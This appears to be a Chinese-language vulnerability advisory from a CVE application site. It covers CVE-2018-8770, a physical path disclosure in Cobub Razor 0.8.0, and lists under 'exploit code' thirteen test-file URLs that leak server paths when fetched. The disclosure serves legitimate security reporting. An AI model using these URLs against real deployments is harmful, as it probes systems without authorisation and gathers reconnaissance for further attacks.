CVE中文申请站

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在物理路径泄露漏洞
上报日期: 2018-04-20
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8770


二、漏洞概述

Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。

三、利用代码

HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/31/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
EXPLOIT-DB:https://www.exploit-db.com/exploits/44495/

标签: none